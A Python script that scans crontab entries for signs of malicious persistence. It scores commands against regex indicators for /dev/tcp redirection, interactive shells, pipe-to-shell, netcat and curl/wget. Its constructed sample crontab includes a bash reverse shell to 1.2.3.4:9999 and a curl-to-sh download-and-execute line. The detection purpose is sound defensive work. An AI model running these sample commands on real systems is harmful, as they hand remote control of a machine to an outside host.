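import re
from typing import Dict, List, Optional, Tuple

# Constructed sample, in the form `crontab -l` prints it
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/bash
0 3 * * * /usr/local/bin/backup.sh
* * * * * bash -i >& /dev/tcp/1.2.3.4/9999 0>&1
*/15 * * * * curl -s http://1.2.3.4/u.sh | sh
@reboot /Applications/Safari.app/Contents/MacOS/Safari
"""

# Each matching indicator adds one point to an entry's score
INDICATORS = {
    "dev_tcp": re.compile(r"/dev/(tcp|udp)/"),
    "interactive_shell": re.compile(r"\b(ba|z|)sh\s+-i\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z|)sh\b"),
    "netcat": re.compile(r"\b(nc|ncat|netcat)\b"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
}
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/([^/\s]+)/(\d+)")
EVERY_MINUTE = "* * * * *"


def parse_crontab(text: str) -> List[Dict[str, object]]:
    """Split crontab lines into (line number, schedule, command); skips comments,
    VAR=value assignments and malformed lines; handles @reboot-style specials."""
    entries: List[Dict[str, object]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            schedule, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, cmd = " ".join(parts[:5]), parts[5]
        if not cmd.strip():
            continue
        entries.append({"line": lineno, "schedule": schedule, "command": cmd.strip()})
    return entries


def remote_endpoint(cmd: str) -> Optional[Tuple[str, int]]:
    """Pull host and port out of a bash /dev/tcp/HOST/PORT redirection."""
    m = DEV_TCP.search(cmd)
    return (m.group(1), int(m.group(2))) if m else None


def scan(text: str, min_score: int = 2) -> List[Dict[str, object]]:
    """Return entries whose indicator count (plus one for an every-minute
    schedule, the beaconing pattern in the post) reaches min_score."""
    findings: List[Dict[str, object]] = []
    for entry in parse_crontab(text):
        cmd = str(entry["command"])
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        score = len(hits) + (1 if entry["schedule"] == EVERY_MINUTE else 0)
        if score >= min_score:
            findings.append({**entry, "indicators": hits, "score": score,
                             "remote": remote_endpoint(cmd)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_CRONTAB):
        print(f"line {f['line']}: score={f['score']} remote={f['remote']} {f['command']}")
```

On a live system the text comes from `crontab -l` run per user (root's crontab lives separately from each user's), and an entry that fetches a script over plain HTTP and pipes it to a shell scores the same way as the reverse shell, since both hand control to the host named in the command.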